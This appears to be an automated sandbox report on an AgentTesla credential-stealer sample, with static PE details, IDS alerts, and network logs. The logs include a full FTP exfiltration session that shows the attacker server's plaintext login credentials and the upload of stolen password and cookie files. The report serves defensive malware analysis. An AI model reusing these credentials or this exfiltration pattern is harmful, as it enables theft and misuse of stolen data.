	SKMB610952.js	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
aminhacorretora.com.br	Hangarskibenes.exe	Get hash	malicious	GuLoader	Browse	162.241.203.30

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OIS1US	Xc501VOacR.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	umVoLahqZn.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	tTXQS6DONV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	dY1ZxYJOz7.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	i9QKJCpVZJ.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	192.185.147.100
	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.185.147.100
	https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627	Get hash	malicious	HTMLPhisher	Browse	162.241.71.126
	http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrm	Get hash	malicious	Unknown	Browse	162.241.71.126
	https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com	Get hash	malicious	Unknown	Browse	162.241.71.126

Process:	C:\Users\user\Desktop\wva4mZuUb4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLV1qE4x84qpE4KlKDE4KhKiKhIE4KnKIE4oKNzKoZAE4Kze0E4j:Mp1qHxv2HKlYHKh3oIHKntHo6hAHKzea
MD5:	8275047EA04782E18195CE5F2F076225
SHA1:	86FE553781E50EE2493A6D54A2F329FF94AD0DEE
SHA-256:	302DE184C80A778557AA7F09DDCAB59FED5712B6BC617FDEAFE1E004021FFDDC
SHA-512:	4F7B9BE379C98D5E9609D46FC0B473C66A977C3A081C60872CB8FE344C2785A285E9D9019D49515A6DC5D1E6EFF2D8DD5E5BA49086AF24F8A2F50E6B9EBE588B
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Roaming\cyfuvf1u.rty\Chrome\Default\Network\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cyfuvf1u.rty\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cyfuvf1u.rty\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.168259436591761
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	wva4mZuUb4.exe
File size:	834'048 bytes
MD5:	c6ad6edfa92898ce230177f0ecb4890c
SHA1:	49b4e85cbf95afab5be60b3272370886418d64e9
SHA256:	872f1970c19bbf2031fe43f9ed034f1edd2763e6ecda2de368336da3312d8463
SHA512:	3865985334c5ac7a62f8cace759d2dcd13f8217472d9f3205eceaa0a418d1663f0f60826341ad569e4eeff22da86b1af80b49df8d4598e6e7b816c06113d8a6a
SSDEEP:	12288:etc3yuZG8+De1kIse8LRWjrZCollIoNE8kOZu3OvK541rViCm:etc3yuZGVteKRyjl6ik4COvy41rV
TLSH:	E005F19903FC9EA0FA7E1BB5C57212044B75B447B872E35C86C090FA5D73BE28992763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......+................................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4cd12e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x2BA31797 [Sun Mar 14 11:31:35 1993 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcd0d4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x3bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcb134	0xcb200	26eba218b095434232afd6b6300df7a1	False	0.7669146634615385	data	7.176062278190911	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x3bc	0x400	9d9e143f1fca4a0685d8e5d8afeb5a33	False	0.4169921875	data	3.3068409614403143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0xc	0x200	37ebcbf33e897c6c0e4f8ce039547c90	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xce058	0x364	data			0.4504608294930876

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-05T17:29:52.838168+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.7	49835	162.241.203.30	21	TCP
2024-12-05T17:29:53.773083+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49846	162.241.203.30	44938	TCP
2024-12-05T17:29:53.893896+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49846	162.241.203.30	44938	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 17:29:49.300371885 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:49.420286894 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:49.420820951 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:50.572643995 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:50.572849035 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:50.692922115 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:50.908552885 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:50.908767939 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:51.028603077 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:51.362410069 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:51.365047932 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:51.485551119 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:51.718318939 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:51.718554974 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:51.839087963 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:52.051671982 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:52.051917076 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:52.173274994 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:52.385242939 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:52.385406017 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:52.506860018 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:52.717539072 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:52.718235970 CET	49846	44938	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:52.770834923 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:52.837995052 CET	44938	49846	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:52.838069916 CET	49846	44938	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:52.838167906 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:52.958103895 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:53.772799969 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:53.773082972 CET	49846	44938	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:53.773138046 CET	49846	44938	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:53.817605019 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:53.893690109 CET	44938	49846	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:53.893806934 CET	44938	49846	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:53.893896103 CET	49846	44938	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:54.109085083 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:54.157854080 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:54.277652979 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:54.489896059 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:54.490277052 CET	49851	46076	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:54.536339998 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:54.611881018 CET	46076	49851	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:54.612051010 CET	49851	46076	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:54.612132072 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:54.731878996 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:55.572333097 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:55.572616100 CET	49851	46076	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:55.572681904 CET	49851	46076	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:55.615098000 CET	49835	21	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:55.692434072 CET	46076	49851	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:55.692465067 CET	46076	49851	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:55.692477942 CET	46076	49851	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:55.692980051 CET	46076	49851	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:55.693028927 CET	49851	46076	192.168.2.7	162.241.203.30
Dec 5, 2024 17:29:55.905266047 CET	21	49835	162.241.203.30	192.168.2.7
Dec 5, 2024 17:29:55.958342075 CET	49835	21	192.168.2.7	162.241.203.30

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 17:29:48.925097942 CET	60510	53	192.168.2.7	1.1.1.1
Dec 5, 2024 17:29:49.294320107 CET	53	60510	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 17:29:48.925097942 CET	192.168.2.7	1.1.1.1	0xe6af	Standard query (0)	ftp.aminhacorretora.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 17:29:49.294320107 CET	1.1.1.1	192.168.2.7	0xe6af	No error (0)	ftp.aminhacorretora.com.br	aminhacorretora.com.br		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 17:29:49.294320107 CET	1.1.1.1	192.168.2.7	0xe6af	No error (0)	aminhacorretora.com.br		162.241.203.30	A (IP address)	IN (0x0001)	false

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 5, 2024 17:29:50.572643995 CET	21	49835	162.241.203.30	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Dec 5, 2024 17:29:50.572849035 CET	49835	21	192.168.2.7	162.241.203.30	USER logsftp@aminhacorretora.com.br
Dec 5, 2024 17:29:50.908552885 CET	21	49835	162.241.203.30	192.168.2.7	331 User logsftp@aminhacorretora.com.br OK. Password required
Dec 5, 2024 17:29:50.908767939 CET	49835	21	192.168.2.7	162.241.203.30	PASS _yA=,M5*J?KH
Dec 5, 2024 17:29:51.362410069 CET	21	49835	162.241.203.30	192.168.2.7	230 OK. Current restricted directory is /
Dec 5, 2024 17:29:51.718318939 CET	21	49835	162.241.203.30	192.168.2.7	504 Unknown command
Dec 5, 2024 17:29:51.718554974 CET	49835	21	192.168.2.7	162.241.203.30	PWD
Dec 5, 2024 17:29:52.051671982 CET	21	49835	162.241.203.30	192.168.2.7	257 "/" is your current location
Dec 5, 2024 17:29:52.051917076 CET	49835	21	192.168.2.7	162.241.203.30	TYPE I
Dec 5, 2024 17:29:52.385242939 CET	21	49835	162.241.203.30	192.168.2.7	200 TYPE is now 8-bit binary
Dec 5, 2024 17:29:52.385406017 CET	49835	21	192.168.2.7	162.241.203.30	PASV
Dec 5, 2024 17:29:52.717539072 CET	21	49835	162.241.203.30	192.168.2.7	227 Entering Passive Mode (162,241,203,30,175,138)
Dec 5, 2024 17:29:52.838167906 CET	49835	21	192.168.2.7	162.241.203.30	STOR PW_user-367706_2024_12_05_12_39_23.html
Dec 5, 2024 17:29:53.772799969 CET	21	49835	162.241.203.30	192.168.2.7	150 Accepted data connection
Dec 5, 2024 17:29:54.109085083 CET	21	49835	162.241.203.30	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.333 seconds (measured here), 0.95 Kbytes per second
Dec 5, 2024 17:29:54.157854080 CET	49835	21	192.168.2.7	162.241.203.30	PASV
Dec 5, 2024 17:29:54.489896059 CET	21	49835	162.241.203.30	192.168.2.7	227 Entering Passive Mode (162,241,203,30,179,252)
Dec 5, 2024 17:29:54.612132072 CET	49835	21	192.168.2.7	162.241.203.30	STOR CO_user-367706_2024_12_05_12_39_28.zip
Dec 5, 2024 17:29:55.572333097 CET	21	49835	162.241.203.30	192.168.2.7	150 Accepted data connection
Dec 5, 2024 17:29:55.905266047 CET	21	49835	162.241.203.30	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.333 seconds (measured here), 10.06 Kbytes per second

Target ID:	0
Start time:	11:28:40
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\wva4mZuUb4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wva4mZuUb4.exe"
Imagebase:	0x5b0000
File size:	834'048 bytes
MD5 hash:	C6AD6EDFA92898CE230177F0ECB4890C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:38:49
Start date:	05/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xad0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2491018423.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.1%
Total number of Nodes:	98
Total number of Limit Nodes:	8

Executed Functions

Function 0780401E Relevance: 6.8, Strings: 3, Instructions: 3078
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G, xrefs: 07804038
@, xrefs: 07807484
@, xrefs: 07807494

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: @$@$G
API String ID: 0-3628805992
Opcode ID: 835dcaddd45e2b627364ed27e8389e819785d3994d8c857fd9ef80b8f6dfa3b2
Instruction ID: 9ce777ba27d6a0f4317a1bea10c337182c942656e6473bbd2636b652db90eef9
Opcode Fuzzy Hash: 835dcaddd45e2b627364ed27e8389e819785d3994d8c857fd9ef80b8f6dfa3b2
Instruction Fuzzy Hash: C2539970A047188FCB58EF79D89939DBFB1AF88300F5044EAD549A3355DE38AD88CB95

Function 077A4535 Relevance: 5.5, Instructions: 5514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9742127ed0b6cb017eda01f0bf9605cd5ec4d0ccaae989e1e3ccb9047683c4
Instruction ID: db5857cdd181700cddd447acc8aaf4f7ba5f6d101333368c9c37970d96b98a9e
Opcode Fuzzy Hash: 0f9742127ed0b6cb017eda01f0bf9605cd5ec4d0ccaae989e1e3ccb9047683c4
Instruction Fuzzy Hash: E5B34670A057188FDB58EF39D989AACBBF2BB89301F0185EAD049A3754DB349D94CF41

Function 077A4560 Relevance: 5.5, Instructions: 5499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02aa59edcc8f5dcfa764338b60b826ae490f18b6de4541751552951d615b82ad
Instruction ID: 6937d3dc70e99fe5fb62bed37920d37e979699bce1788b0cc3eaa3fc3aef346b
Opcode Fuzzy Hash: 02aa59edcc8f5dcfa764338b60b826ae490f18b6de4541751552951d615b82ad
Instruction Fuzzy Hash: 1FB34670A057188FDB58EF39D989AACBBF2BB89301F0185EAD049A3754DB349D94CF41

Function 06274A58 Relevance: 5.2, Instructions: 5237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1923700244.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6270000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba6f646791d358b0ae969ea45ddca07a44f0441550bee3e7344c278ee41e751
Instruction ID: ac093a3d1926777baa1bc797cd476263ad2569c67c6eb5a721d60e0fc3af2bea
Opcode Fuzzy Hash: 2ba6f646791d358b0ae969ea45ddca07a44f0441550bee3e7344c278ee41e751
